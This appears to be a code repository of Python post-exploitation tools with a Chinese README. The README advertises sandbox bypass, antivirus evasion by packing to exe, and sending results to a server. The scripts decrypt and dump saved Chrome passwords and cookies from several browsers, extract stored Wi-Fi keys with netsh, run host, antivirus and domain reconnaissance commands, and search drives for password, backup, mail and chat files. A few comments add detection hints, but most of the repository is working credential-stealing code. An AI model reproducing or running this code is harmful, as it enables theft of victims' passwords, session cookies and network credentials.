├── README.md ├── Result └── readme.md ├── getBowserInfo.py ├── getConWifiInfo.py ├── getHostInfo.py └── getSensitiveFile.py /README.md: -------------------------------------------------------------------------------- 1 | 绕简单沙箱,需要在同目录下创建Result文件夹才可正常运行 2 | 3 | ### 0x01 getBowserInfo 4 | Intro:获取各类浏览器的书签、浏览记录、cookie、存储的账号密码 5 | ![bowser](https://user-images.githubusercontent.com/52556245/135703768-8802d0ac-bbed-4871-a06a-c95ef4e569f9.png) 6 | 7 | ### 0x02 getConWifiInfo 8 | Intro:获取本地wifi账号密码 9 | ![wifi](https://user-images.githubusercontent.com/52556245/135703774-d05f1226-7209-43af-bf24-34431a2d6fca.png) 10 | 11 | ### 0x03 getSensitiveFile 12 | Intro:获取本地敏感文件、下载信息、聊天软件缓存及下载信息等 13 | ![sensitive](https://user-images.githubusercontent.com/52556245/135703777-e0e55f3a-c72e-443a-834d-eb69ab42bb7a.png) 14 | 15 | ### 0x04 getHostInfo 16 | Intro:获取本机硬件、网络、杀软、域环境、计划任务、服务、dns、软件等信息 17 | ![host](https://user-images.githubusercontent.com/52556245/135703781-77be348d-59f6-4870-910f-506ca6100941.png) 18 | 19 | ### 注: 20 | 可通过request发包把最后结果/文件发给服务器; 21 | 可通过三方模块打包成exe等集成环境,360、火绒等不会报毒哈。 22 | -------------------------------------------------------------------------------- /Result/readme.md: -------------------------------------------------------------------------------- 1 | ### 该文档保存结果为csv文档 -------------------------------------------------------------------------------- /getBowserInfo.py: -------------------------------------------------------------------------------- 1 | import os,sys 2 | import json 3 | import base64 4 | import sqlite3 5 | import win32crypt 6 | from Crypto.Cipher import AES 7 | import shutil 8 | from datetime import datetime, timedelta 9 | from cryptography.hazmat.backends import default_backend 10 | from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes 11 | import browser_cookie3 12 | import requests 13 | import csv 14 | 15 | #初始化地址 16 | if 'win' in sys.platform: 17 | BookmarksPath = os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User 
Data/Default/Bookmarks') # saved bookmarks 18 | localStatePath = os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Local State')# holds os_crypt.encrypted_key, the wrapped AES key for stored secrets 19 | loginDataPath = os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Default/Login Data')# saved site usernames and encrypted passwords 20 | cookiesPath= os.path.expandvars('%LOCALAPPDATA%/Google/Chrome/User Data/Default/Cookies')# cookie store; NOTE(review): reads of these profile files by a non-browser process are a useful detection signal 21 | elif 'linux' in sys.platform: 22 | BookmarksPath = os.path.expanduser('~/.config/google-chrome/Default/Bookmarks') 23 | localStatePath = os.path.expanduser('~/.config/google-chrome/Local State') 24 | loginDataPath = os.path.expanduser('~/.config/chromium/Default/Login Data') 25 | cookiesPath = os.path.expanduser('~/.config/chromium/Default/Cookies') 26 | else:#Mac 27 | BookmarksPath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Default/Bookmarks') 28 | localStatePath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Local State') 29 | loginDataPath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Default/Login Data') 30 | cookiesPath = os.path.expanduser('~/Library/Application Support/Google/Chrome/Default/Cookies') 31 | 32 | 33 | def getChromeTime(chromedate): # convert a Chrome timestamp (microseconds added to 1601-01-01) to a string; returns '' on any error 34 | try: 35 | return str(datetime(1601, 1, 1) + timedelta(microseconds=chromedate)) 36 | except: 37 | return '' 38 | 39 | def getEncKey(): # load Local State, base64-decode os_crypt.encrypted_key, drop its first 5 bytes and unwrap the rest with CryptUnprotectData 40 | with open(localStatePath, "r", encoding="utf-8") as f: 41 | localStateTest = f.read() 42 | localState = json.loads(localStateTest) 43 | key = base64.b64decode(localState["os_crypt"]["encrypted_key"])[5:] 44 | return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] 45 | 46 | # Chrome-specific; can be removed in favour of the shared method 47 | def getDecCookie(encCookie): # decrypt one cookie value by its prefix (dpapiDecrypt or aesDecrypt branch); returns None on WindowsError, and the non-win32 branch raises WindowsError 48 | if sys.platform == 'win32': 49 | try: 50 | if encCookie[:4] == b'x01x00x00x00': 51 | decCookie = dpapiDecrypt(encCookie) 52 | return decCookie.decode() 53 | elif encCookie[:3] == b'v10': 54 | decCookie = aesDecrypt(encCookie) 55 | return decCookie[:-16].decode() 56 | except 
WindowsError: 57 | return None 58 | else: 59 | raise WindowsError 60 | 61 | # Chrome-specific; can be removed in favour of the shared method 62 | def dpapiDecrypt(encCookie): # decrypt a blob by calling crypt32 CryptUnprotectData through ctypes; the output buffer is released with LocalFree 63 | import ctypes 64 | import ctypes.wintypes 65 | 66 | class DATA_BLOB(ctypes.Structure): 67 | _fields_ = [('cbData', ctypes.wintypes.DWORD), 68 | ('pbData', ctypes.POINTER(ctypes.c_char))] 69 | 70 | p = ctypes.create_string_buffer(encCookie, len(encCookie)) 71 | blobin = DATA_BLOB(ctypes.sizeof(p), p) 72 | blobout = DATA_BLOB() 73 | retval = ctypes.windll.crypt32.CryptUnprotectData( 74 | ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout)) 75 | if not retval: 76 | raise ctypes.WinError() 77 | result = ctypes.string_at(blobout.pbData, blobout.cbData) 78 | ctypes.windll.kernel32.LocalFree(blobout.pbData) 79 | return result 80 | 81 | # Chrome-specific; can be removed in favour of the shared method 82 | def aesDecrypt(encCookie): # AES-GCM decrypt with the key from getEncKey(); bytes 3..15 are the nonce and only update() is called on the decryptor 83 | key = getEncKey() 84 | nonce = encCookie[3:15] 85 | cipher = Cipher(algorithms.AES(key), None, backend=default_backend()) 86 | cipher.mode = modes.GCM(nonce) 87 | decryptor = cipher.decryptor() 88 | return decryptor.update(encCookie[15:]) 89 | 90 | def decPassword(password, key): # decrypt a stored password: AES-GCM first, CryptUnprotectData as fallback, "" when both fail 91 | try: 92 | iv = password[3:15] 93 | password = password[15:] 94 | cipher = AES.new(key, AES.MODE_GCM, iv) 95 | return cipher.decrypt(password)[:-16].decode() 96 | except: 97 | try: 98 | return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1]) 99 | except: 100 | return "" 101 | 102 | def getPassword(): # print the saved Chrome logins and write them to the CSV 103 | csv_writer.writerow([ 'ID','【Chrome】url地址', '账号','密码','最后使用时间']) 104 | key = getEncKey() 105 | filename = "chromeLoginData.db" 106 | # work on a copy of the Chrome database so a running browser's lock does not block the read; NOTE(review): a "chromeLoginData.db" file appearing in a non-browser working directory is a host artifact of this step 107 | shutil.copyfile(loginDataPath, filename) 108 | db = sqlite3.connect(filename) 109 | db.text_factory = str 110 | cursor = db.cursor() 111 | cursor.execute("select origin_url, username_value, password_value, date_last_used from logins order by date_created") 112 | id=0 113 | for row in cursor.fetchall(): 114 | url = row[0] 115 | 
username = row[1] 116 | password = decPassword(row[2], key) 117 | dateLastUsed = row[3] 118 | if username or password: 119 | id=id+1 120 | print("\nURL: "+url) 121 | print("Username: "+username) 122 | print("Password: "+password) 123 | print("Last Used: "+getChromeTime(dateLastUsed)) 124 | csv_writer.writerow([ id, url, username,password,getChromeTime(dateLastUsed)]) 125 | else: 126 | continue 127 | cursor.close() 128 | db.close() 129 | csv_writer.writerow(' ') 130 | try: 131 | os.remove(filename) 132 | except: 133 | pass 134 | 135 | def formatCookiejar(cookiejar): # split the string form of a cookiejar into host/name/value, print each entry and write it to the CSV 136 | cookieList = str(cookiejar)[12:-3].split(">, <") 137 | newCookieList=[] 138 | id=0 139 | for i in range(len(cookieList)): 140 | id=id+1 141 | host=cookieList[i].split(" for ")[1] 142 | name=cookieList[i].split("Cookie ")[1].split("=")[0] 143 | cookie=cookieList[i].split("=")[1].split(" for ")[0] 144 | print('\nHost: %s\nName: %s\nCookie: %s'%(host,name,cookie)) 145 | csv_writer.writerow([ id, host, name, cookie]) 146 | 147 | def getCookie(): # query browser_cookie3 for Chrome, Firefox, Opera, Edge and Chromium in turn; a "not detected" row is written when a browser's branch fails 148 | try: 149 | chromeCookie = browser_cookie3.chrome() 150 | print('\n\n-------------Chrome浏览器Cookie如下:-------------') 151 | getChromeCookie() 152 | except: 153 | try: 154 | csv_writer.writerow([ 'ID','【Chrome】url地址', 'Name', 'Cookie']) 155 | formatCookiejar(chromeCookie) 156 | csv_writer.writerow(' ') 157 | except: 158 | chromeCookie = [] 159 | csv_writer.writerow([ ' ','未检测到Chrome浏览器', ' ', ' ']) 160 | csv_writer.writerow(' ') 161 | print('\n未检测到Chrome浏览器') 162 | try: 163 | firefoxCookie = browser_cookie3.firefox() 164 | csv_writer.writerow([ 'ID','【Firefox】url地址', 'Name', 'Cookie']) 165 | print('\n\n-------------Firefox浏览器Cookie如下:-------------') 166 | formatCookiejar(firefoxCookie) 167 | csv_writer.writerow(' ') 168 | except: 169 | firefoxCookie = [] 170 | csv_writer.writerow([ ' ','未检测到Firefox浏览器', ' ', ' ']) 171 | csv_writer.writerow(' ') 172 | print('\n未检测到Firefox浏览器') 173 | try: 174 | operaCookie = 
browser_cookie3.opera() 175 | csv_writer.writerow([ 'ID','【Opera】url地址', 'Name', 'Cookie']) 176 | print('\n\n-------------Opera浏览器Cookie如下:-------------') 177 | formatCookiejar(operaCookie) 178 | csv_writer.writerow(' ') 179 | except: 180 | operaCookie = [] 181 | csv_writer.writerow([ ' ','未检测到Opera浏览器', ' ', ' ']) 182 | csv_writer.writerow(' ') 183 | print('\n未检测到Opera浏览器') 184 | try: 185 | edgeCookie = browser_cookie3.edge() 186 | csv_writer.writerow([ 'ID','【Edge】url地址', 'Name', 'Cookie']) 187 | print('\n\n-------------Edge浏览器Cookie如下:-------------') 188 | formatCookiejar(edgeCookie) 189 | csv_writer.writerow(' ') 190 | except: 191 | edgeCookie = [] 192 | csv_writer.writerow([ ' ','未检测到Edge浏览器', ' ', ' ']) 193 | csv_writer.writerow(' ') 194 | print('\n未检测到Edge浏览器') 195 | try: 196 | chromiumCookie = browser_cookie3.chromium() 197 | csv_writer.writerow([ 'ID','【Chromium】url地址', 'Name', 'Cookie']) 198 | print('\n\n-------------Chromium浏览器Cookie如下:-------------') 199 | formatCookiejar(chromiumCookie) 200 | csv_writer.writerow(' ') 201 | except: 202 | chromiumCookie = [] 203 | csv_writer.writerow([ ' ','未检测到Chromium浏览器', ' ', ' ']) 204 | csv_writer.writerow(' ') 205 | print('\n未检测到Chromium浏览器') 206 | 207 | # Chrome-specific; can be removed in favour of the shared method 208 | def getChromeCookie(): # copy Chrome's Cookies database to "chromeCookieData.db" and record every row that has a non-empty encrypted_value 209 | filename = "chromeCookieData.db" 210 | shutil.copyfile(cookiesPath, filename) 211 | db = sqlite3.connect(filename) 212 | cursor = db.cursor() 213 | cursor.execute("select host_key,path,name,encrypted_value,expires_utc from cookies")# needs a recent sqlite3, otherwise encrypted_value fails to convert to utf-8 214 | csv_writer.writerow([ 'ID','【Chrome】url地址', 'Path', 'Name', 'Cookie', '有效期']) 215 | id=0 216 | for row in cursor.fetchall(): 217 | try: 218 | host = row[0] 219 | path = row[1] 220 | name = row[2] 221 | encrypted_value = row[3] 222 | expires_utc =getChromeTime(row[4]) 223 | if encrypted_value: 224 | id=id+1 225 | print("\nHost: "+host) 226 | print("Path: "+path) 227 | print("Name: "+name) 228 | try: 229 | 
cookie=win32crypt.CryptUnprotectData(encrypted_value)[1].decode() # decryption path for Chrome before 80.x 230 | except Exception as e: 231 | cookie=getDecCookie(encrypted_value) # decryption path for Chrome 80.x and later 232 | print("Cookie: "+cookie) 233 | print("Expires: "+expires_utc) 234 | csv_writer.writerow([ id, host, path, name, cookie, expires_utc]) 235 | except: 236 | continue 237 | cursor.close() 238 | db.close() 239 | csv_writer.writerow(' ') 240 | try: 241 | os.remove(filename) 242 | except: 243 | pass 244 | 245 | def forBookmarks(itemData,id): # walk bookmark entries recursively, printing and recording each item of type 'url' 246 | for item in itemData: 247 | type = item['type'] 248 | name = item['name'] 249 | if type == 'url': 250 | id = id+1 251 | print('\nTitle: ',name, '\nUrl: ',item['url']) 252 | csv_writer.writerow([ id,name,item['url']]) 253 | else: # folder 254 | forBookmarks(item['children'],id) 255 | 256 | 257 | def getBookmarks(): # read the roots.bookmark_bar.children tree from Chrome's Bookmarks file and record it 258 | csv_writer.writerow([ 'ID','【Chrome】书签名', 'url地址']) 259 | with open(BookmarksPath, 'r',encoding = "utf-8") as f: 260 | itemData=json.loads(f.read())['roots']['bookmark_bar']['children'] 261 | id=0 262 | forBookmarks(itemData,id) 263 | csv_writer.writerow(' ') 264 | 265 | 266 | def main(): 267 | print('\n-------------Chrome浏览器书签如下:-------------') 268 | getBookmarks() 269 | 270 | print('\n\n-------------Chrome浏览器密码如下:-------------') 271 | getPassword() 272 | print('\n\n-------------各浏览器Cookie如下:-------------') 273 | getCookie() 274 | 275 | if __name__ == "__main__": 276 | filename='./Result/bowserInfo.csv' 277 | with open(filename, 'w', encoding='utf-8', newline='') as q: 278 | csv_writer = csv.writer(q) 279 | main() -------------------------------------------------------------------------------- /getConWifiInfo.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF-8 -*- 2 | import os 3 | import importlib,sys 4 | import csv 5 | importlib.reload(sys) 6 | 7 | 8 | # collect the name and password of every Wi-Fi profile this machine has connected to; NOTE(review): netsh "wlan show profiles" with key=clear launched by a script interpreter is a process-creation pattern worth alerting on 9 | def checkWIFI(): 10 | list = [] 11 | # list all saved Wi-Fi profile names 12 | message = os.popen('netsh 
wlan show profiles').readlines() 13 | print('正在解析中,请稍等……') 14 | for i in message: 15 | result = i.strip().encode().decode("utf-8") 16 | 17 | if result.find(u"所有用户配置文件 : ") != -1: 18 | command = 'netsh wlan show profiles name="' + result[11:] + '" key=clear' 19 | try: 20 | per_wifi = os.popen(command).readlines() 21 | except: 22 | per_wifi = [] 23 | 24 | for j in per_wifi: 25 | passwd = j.strip().encode().decode("utf-8") 26 | 27 | if passwd.find(u"关键内容 :") != -1:# when the password string is not empty 28 | if passwd[18:] != '': 29 | list_temp = [] 30 | list_temp.append(result[11:]) 31 | list_temp.append(passwd[18:]) 32 | list.append(list_temp) 33 | return list 34 | 35 | if __name__ == "__main__": 36 | list = checkWIFI() 37 | print("返回结果如下:") 38 | filename='./Result/conWifiInfo.csv' 39 | with open(filename, 'w', encoding='utf-8', newline='') as q: 40 | csv_writer = csv.writer(q) 41 | csv_writer.writerow([ 'ID','wifi名称', '密码']) 42 | i = 0 43 | for j in list: 44 | i = i + 1 45 | print(str(i) + "、wifi名称:" + j[0] + ",密码:" + j[1]) 46 | csv_writer.writerow([ i, j[0], j[1]]) -------------------------------------------------------------------------------- /getHostInfo.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF-8 -*- 2 | import os,sys 3 | import csv 4 | 5 | cmdList={ 6 | # host commands; NOTE(review): every value in this map is run through os.popen by main(), so the whole set appears as a burst of built-in Windows discovery commands under one parent process 7 | "当前用户":"whoami /all", 8 | "网络信息":"ipconfig /all", 9 | "计算机版本/补丁编号":"systeminfo", 10 | "进程列表":"tasklist", 11 | "补丁信息":"wmic qfe", 12 | "系统信息":"wmic os", 13 | "机器运行信息":"net statistics workstation", 14 | "系统架构":"set process", 15 | "防火墙配置":"netsh firewall show config", 16 | "日志修改权限":"wmic nteventlog get path,filename,writeable", 17 | "当前在线用户":"quser", 18 | "本地用户":"net user", 19 | "本机管理员":"net localgroup administrators", 20 | "已安装软件信息":"wmic product get name,version", 21 | # antivirus 22 | "杀软信息":r"WMIC /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe", 23 | # network 24 | "端口信息":"netstat -ano", 25 | "路由信息":"route print", 
26 | "arp信息":"arp -a", 27 | "host信息":"type c:\Windows\system32\drivers\etc\hosts", 28 | "wifi密码":"netsh wlan show profile", 29 | # scheduled tasks 30 | "计划任务":"schtasks", 31 | # services 32 | "自启服务":"wmic startup get command, caption", 33 | "已启服务":"net start", 34 | "本机服务":"wmic service list brief", 35 | # DNS 36 | "DNS服务器":"nslookup", 37 | "DNS缓存":"ipconfig /displaydns", 38 | "DNS服务器":"nslookup", 39 | # domain information 40 | "当前域信息":"net config workstation", 41 | "当前连接":"net use", 42 | "当前映射":"net share", 43 | "域环境":"net view", 44 | "定位域控":"net time", 45 | "定位域控":"net group \"domain controllers\" /domain", 46 | "域用户":"net user /domain", 47 | "域用户详情":"wmic useraccount get /all ", 48 | "域用户密码策略":"net accounts /domain", 49 | "本地用户组信息":"net localgroup", 50 | "域用户组信息":"net group /domain", 51 | "域用户组成员":"net \"Domain users\" /domain", 52 | "域管理员用户组成员":"net group \"Domain Admins\" /domain", 53 | "域管理员用户组成员":"net group \"Enterprise Admins\" /domain", 54 | "域信任信息":"nltest /domain_trusts", 55 | } 56 | choseList={} 57 | 58 | def main(): 59 | # selective execution could be added: put the chosen entries into choseList and run those 60 | # by default everything below is executed 61 | id=0 62 | for key,value in cmdList.items(): 63 | id=id+1 64 | print('\n\n-------------%s-------------'%key) 65 | message = os.popen(value).read() 66 | print(message) 67 | csv_writer.writerow([ id, key, message]) 68 | 69 | if __name__ == "__main__": 70 | filename='./Result/hostInfo.csv' 71 | with open(filename, 'w', encoding='utf-8', newline='') as q: 72 | csv_writer = csv.writer(q) 73 | csv_writer.writerow([ 'ID','类型', '信息']) 74 | main() -------------------------------------------------------------------------------- /getSensitiveFile.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF-8 -*- 2 | import os,sys 3 | import csv 4 | 5 | cmdList={ 6 | "QQ文件":'dir /a /s /b "C:/Users/Administrator/Documents/Tencent Files/"|findstr "FileRecv.*\."', 7 | "微信文件":'dir /a /s /b "C:/Users/Administrator/Documents/WeChat Files/"|findstr "FileStorage.*\."', 8 | "下载文件":'dir /a /s /b 
"C:/Users/Administrator/Downloads"', 9 | "office数据库文件":'c: & dir /a /s /b "*.mdb" & d: & dir /a /s /b "*.mdb" & e: & dir /a /s /b "*.mdb"', 10 | "sql文件":'c: & dir /a /s /b "*.sql" & d: & dir /a /s /b "*.sql" & e: & dir /a /s /b "*.sql"', 11 | "虚拟光盘文件":'c: & dir /a /s /b "*.mdf" & d: & dir /a /s /b "*.mdf" & e: & dir /a /s /b "*.mdf"', 12 | "outlook电子邮件文件":'c: & dir /a /s /b "*.eml"', 13 | "outlook数据库文件":'c: & dir /a /s /b "*.pst"', 14 | "配置文件":'c: & dir /a /s /b "*.conf*" & d: & dir /a /s /b "*.conf*" & e: & dir /a /s /b "*.conf*"', 15 | "备份文件":'c: & dir /a /s /b "*bak*" & d: & dir /a /s /b "*bak*" & e: & dir /a /s /b "*bak*"', 16 | "密码文件":'c: & dir /a /s /b "*pwd*" & d: & dir /a /s /b "*pwd*" & e: & dir /a /s /b "*pwd*"', 17 | "密码文件":'c: & dir /a /s /b "*pass*" & d: & dir /a /s /b "*pass*" & e: & dir /a /s /b "*pass*"', 18 | #"登录文件":'c: & dir /a /s /b "*login*" & d: & dir /a /s /b "*login*" & e: & dir /a /s /b "*login*"', 19 | #"用户文件":'c: & dir /a /s /b "*user*" & d: & dir /a /s /b "*user*" & e: & dir /a /s /b "*user*"', 20 | } 21 | choseList={} 22 | 23 | def main(): 24 | # selective execution could be added: put the chosen entries into choseList and run those 25 | # by default everything below is executed 26 | # the first run is slow, which is expected; NOTE(review): each entry is a recursive "dir /a /s /b" over whole drives, so a run shows up as repeated full-volume enumeration from shell children of one process 27 | id=0 28 | for key,value in cmdList.items(): 29 | id = id + 1 30 | print('\n\n-------------%s-------------'%key) 31 | message = os.popen(value).read() 32 | print(message) 33 | csv_writer.writerow([ id, key, message]) 34 | # selective reading of a chosen file could be added --- not done here 35 | 36 | if __name__ == "__main__": 37 | filename='./Result/sensitiveFile.csv' 38 | with open(filename, 'w', encoding='utf-8', newline='') as q: 39 | csv_writer = csv.writer(q) 40 | csv_writer.writerow([ 'ID','类型', '路径']) 41 | main() --------------------------------------------------------------------------------